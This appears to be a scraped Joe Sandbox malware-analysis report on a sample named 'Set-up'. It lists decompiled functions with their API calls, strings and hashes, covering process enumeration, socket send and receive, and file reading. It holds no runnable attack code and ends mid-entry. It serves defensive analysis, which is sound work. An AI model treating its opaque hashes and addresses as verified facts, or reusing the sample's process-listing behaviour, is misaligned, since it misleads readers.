Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
API String ID: 3063597995-203430365
Opcode ID: 21437818d0bbdafcccb12b21bf52119d87f12548589aece54f2a9a3fa5943f8d
Instruction ID: a765626bf073cece10b9e68b284ae67ab1e312bdbb7850947dc834a460483a03
Opcode Fuzzy Hash: 21437818d0bbdafcccb12b21bf52119d87f12548589aece54f2a9a3fa5943f8d
Instruction Fuzzy Hash: 8421F5A2F843447BF12132B63C43F1F3A498B51B59F194036FD4D782D3E569A924A2B3

Function 00DC31D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00DC31EF
Process32First.KERNEL32 ref: 00DC3245
Process32Next.KERNEL32 ref: 00DC32CC
CloseHandle.KERNELBASE ref: 00DC32E7

Strings

name, xrefs: 00DC3272
CreateToolhelp32Snapshot failed., xrefs: 00DC320E
processes, xrefs: 00DC32F3
pid, xrefs: 00DC3297

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
API String ID: 420147892-2059488242
Opcode ID: 544255813839e9bdcafeacee44e069700a9b172f4c6fddce49d881ff18d85287
Instruction ID: b5e9aefd749bd3aceadfc920a79c0f9c252c4540ff88263e1315d8932918c48f
Opcode Fuzzy Hash: 544255813839e9bdcafeacee44e069700a9b172f4c6fddce49d881ff18d85287
Instruction Fuzzy Hash: 383194B491931A9FCB10EFB8C5846AEBBF4AF44304F40896DD898E7340E7349A84CF52

Function 00DC7770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,00DF94BF,?), ref: 00DC77AE
recv.WS2_32(?,?,00DF94BF,?), ref: 00DC77BA
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 00DC77F1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DC7815
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC781D

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00DC77E2, 00DC7801
RECV %s:%d recv(%lu) = %ld, xrefs: 00DC77C8
recv, xrefs: 00DC77DB, 00DC77FA

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: recv$__acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 2542159810-640788491
Opcode ID: 04aa5318bf2544ab261f9188b55bce1d150769cac8ecf2ddbd7edc8e5a49abe4
Instruction ID: f1f3cb54362fd55d6b5976e4bd533d8a0a6d78bb053937f6b9ce2964a34a215e
Opcode Fuzzy Hash: 04aa5318bf2544ab261f9188b55bce1d150769cac8ecf2ddbd7edc8e5a49abe4
Instruction Fuzzy Hash: 0511B2B5A042597FD2209B65EC4DF277B6CEB86B6CF44051CFD0853351D6619C208AF1

Function 00DC75E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,?,?), ref: 00DC7618
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00DC7659
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00DC767D
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DC7685

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00DC764A, 00DC7669
socket, xrefs: 00DC7643, 00DC7662
FD %s:%d socket() = %d, xrefs: 00DC762E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflushsocket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 166263346-842387772
Opcode ID: aba92b41f413d5ab03e5f28ffa0e7d6410b4c6d126d91b86191b47b6dc4ff110
Instruction ID: 38c419bf97b6f8a40019f80ab5de7f753068d6338529e329cbb2008e9de2b998
Opcode Fuzzy Hash: aba92b41f413d5ab03e5f28ffa0e7d6410b4c6d126d91b86191b47b6dc4ff110
Instruction Fuzzy Hash: 5711E976A442526FD6205BAEEC0AF8B7F94DF82739F44051CF918973A2D2618C64CBF1

Function 0114D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0114D1E8

Strings

Inf, xrefs: 0114DCA5, 0114DCBD
@, xrefs: 0114D4B7
NaN, xrefs: 0114DBAB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 9fa04b02f97ca8c12e5c39644b9f810e85c13926c846ac8e4db087ddcc8400f4
Instruction ID: c3f78b4c3c9d5584389a38d1af7a56dabf1eb1cd0d1d2d1a0931e5ed2ea54802
Opcode Fuzzy Hash: 9fa04b02f97ca8c12e5c39644b9f810e85c13926c846ac8e4db087ddcc8400f4
Instruction Fuzzy Hash: 0CF1D07060C3818BDF299F68D0907ABBBE1BB95B14F158A2DD9DD87381D734D906CB82

Function 00DFF6C3 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 359networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(?), ref: 00DFF75B

Strings

%s connect timeout after %lldms, move on!, xrefs: 00DFFA33
%s trying next, xrefs: 00DFF8FE
Connected to %s (%s) port %u, xrefs: 00E00026
%s connect -> %d, connected=%d, xrefs: 00DFF720
%s done, xrefs: 00DFF9CD

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: %s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s trying next$Connected to %s (%s) port %u
API String ID: 1452528299-2219341415
Opcode ID: ccd8634faa66939249850e23159f1885210e567ef81af587f8dadfcb667e48f4
Instruction ID: 5637d9036514e59cd6bf78f085542c5456c9014285c80687cc2ae2a38e26477b
Opcode Fuzzy Hash: ccd8634faa66939249850e23159f1885210e567ef81af587f8dadfcb667e48f4
Instruction Fuzzy Hash: 57E1B3716043499FD724CF19C484B6ABBE1FF84308F19C52CE9899B2A2D771ED85CBA1

Function 00DF9290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC76A0: send.WS2_32(multi.c,?,?,?), ref: 00DC76DE

WSAGetLastError.WS2_32 ref: 00DF93C3

Part of subcall function 00DDD8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00DD01B1), ref: 00DDD8E2

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00DF935C
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00DF9388

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00DF9447
Send failure: %s, xrefs: 00DF93FB
cf-socket.c, xrefs: 00DF92CF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: CounterErrorIoctlLastPerformanceQuerysendsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1798382672-2691795271
Opcode ID: e6405ef9bf5446a2c661eadb7a3e114e10a3a4d9c664aef6c975c9241a219eba
Instruction ID: dea5b2714b56a05b96c54cf6a676d1e5cc04a5dc27ad7d09659ec0439c9e1699
Opcode Fuzzy Hash: e6405ef9bf5446a2c661eadb7a3e114e10a3a4d9c664aef6c975c9241a219eba
Instruction Fuzzy Hash: 6251C174A00309ABD710DF24C891FAAB7A5FF94314F19C52DFE489B292E731E991CB61

Function 00E877B0 Relevance: 10.6, APIs: 7, Instructions: 84fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,013CEBCD,00000000,00000000,?,?,?,00E89882,?,00000000), ref: 00E877DD
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002,?,00000000), ref: 00E877F0
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 00E87802
GetLastError.KERNEL32(?,00000000), ref: 00E8780E
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00000000), ref: 00E87830
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00E87843
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E8786B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: fseek$ErrorLastfclosefopenfreadftell
String ID:
API String ID: 1915723720-0
Opcode ID: 2a7982c93134dc2eb3de725f7a3bb2a2c8588b8116412dfd3ae32a9046dadeaa
Instruction ID: 2055f481736a03f531f820ba9bbf04839e56515aa7baa04d4f6a15ed80216fb8
Opcode Fuzzy Hash: 2a7982c93134dc2eb3de725f7a3bb2a2c8588b8116412dfd3ae32a9046dadeaa
Instruction Fuzzy Hash: EE11B9F2E093116BEB2935615C4ABBB3548DB5076DF281438FD8DE6281F675D804C3B6

Function 00DFA150 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32(?,?,00000080), ref: 00DFA1C6
WSAGetLastError.WS2_32 ref: 00DFA1D0

Part of subcall function 00DDD090: GetLastError.KERNEL32 ref: 00DDD0A1
Part of subcall function 00DDD090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0A9
Part of subcall function 00DDD090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0CD
Part of subcall function 00DDD090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD0D7
Part of subcall function 00DDD090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 00DDD381
Part of subcall function 00DDD090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 00DDD3A2
Part of subcall function 00DDD090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DDD3BF
Part of subcall function 00DDD090: GetLastError.KERNEL32 ref: 00DDD3C9
Part of subcall function 00DDD090: SetLastError.KERNEL32(00000000), ref: 00DDD3D4

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA21C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00DFA220

Strings

getsockname() failed with errno %d: %s, xrefs: 00DFA1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00DFA23B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast_errno$strrchr$__sys_errlist__sys_nerrgetsockname
String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
API String ID: 2076026050-2605427207
Opcode ID: 6a770754f06735a754b3fcb76fe974e9ce7400922d78cfc1c9879b3371361006
Instruction ID: afbd963672f96a0a2f0d3c9d871597eee1c82b8045696e9862fbe9f0004137dc
Opcode Fuzzy Hash: 6a770754f06735a754b3fcb76fe974e9ce7400922d78cfc1c9879b3371361006
Instruction Fuzzy Hash: 2E21F871908284AAE7259B59DC46FF673BCEF81328F044215FA8853152FA32598687F2

Function 00DC7310 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00DC3BA6,?,014F9044,00DC1BD2), ref: 00DC73A6
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00DC3BA6,?,014F9044,00DC1BD2), ref: 00DC73CA
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00DC3BA6,?,014F9044,00DC1BD2), ref: 00DC73D2

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00DC7397, 00DC73B6
MEM %s:%d calloc(%zu,%zu) = %p, xrefs: 00DC7376
calloc, xrefs: 00DC7390, 00DC73AF

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: __acrt_iob_func_errnofflush
String ID: LIMIT %s:%d %s reached memlimit$MEM %s:%d calloc(%zu,%zu) = %p$calloc
API String ID: 4185500129-1340350808
Opcode ID: 154b8d28cf26e25e5a6fb4285fa30ad49137f06312ffcefca737acdd827cb52d
Instruction ID: a0a5bdbd8669c8ff149717a8a1f5bf32bb42d433fdaf9bef3e25021c1680521e
Opcode Fuzzy Hash: 154b8d28cf26e25e5a6fb4285fa30ad49137f06312ffcefca737acdd827cb52d
Instruction Fuzzy Hash: 69219FB1A043526BD2209E56DC45F5B7BA8EB86B58F48042CFD4897312E261D8109BB1

Function 00DDD5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42networklibraryloaderCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00DDD65A

Part of subcall function 00DDD690: GetModuleHandleA.KERNEL32(kernel32,00000000,?,?,?,00DDD5FA,iphlpapi.dll), ref: 00DDD699
Part of subcall function 00DDD690: GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 00DDD6B5
Part of subcall function 00DDD690: strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,013AA7B4,?,?,00DDD5FA,iphlpapi.dll), ref: 00DDD6C3

GetProcAddress.KERNEL32(00000000,if_nametoindex), ref: 00DDD60C
QueryPerformanceFrequency.KERNEL32(014F9070), ref: 00DDD643
WSACleanup.WS2_32 ref: 00DDD67C

Strings

iphlpapi.dll, xrefs: 00DDD5F0
if_nametoindex, xrefs: 00DDD606

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: AddressProc$CleanupFrequencyHandleModulePerformanceQueryStartupstrpbrk
String ID: if_nametoindex$iphlpapi.dll
API String ID: 3452087986-3097795196
Opcode ID: 4c0a47805e7c6088b529ba48211ba70cd1996ef44e124fdc61774f26c704668f
Instruction ID: 473655c415f36bd0a3633332321eb5f753533b8862564928198c9fab6e5a5e66
Opcode Fuzzy Hash: 4c0a47805e7c6088b529ba48211ba70cd1996ef44e124fdc61774f26c704668f
Instruction Fuzzy Hash: 7401FCA0D403404BEB616FB4E80B7663AA4AF55308F88016DF84992396F739C599C3B2

Function 00E74950 Relevance: 6.2, APIs: 4, Instructions: 167networkstringCOMMON

Download Yara Rule

APIs

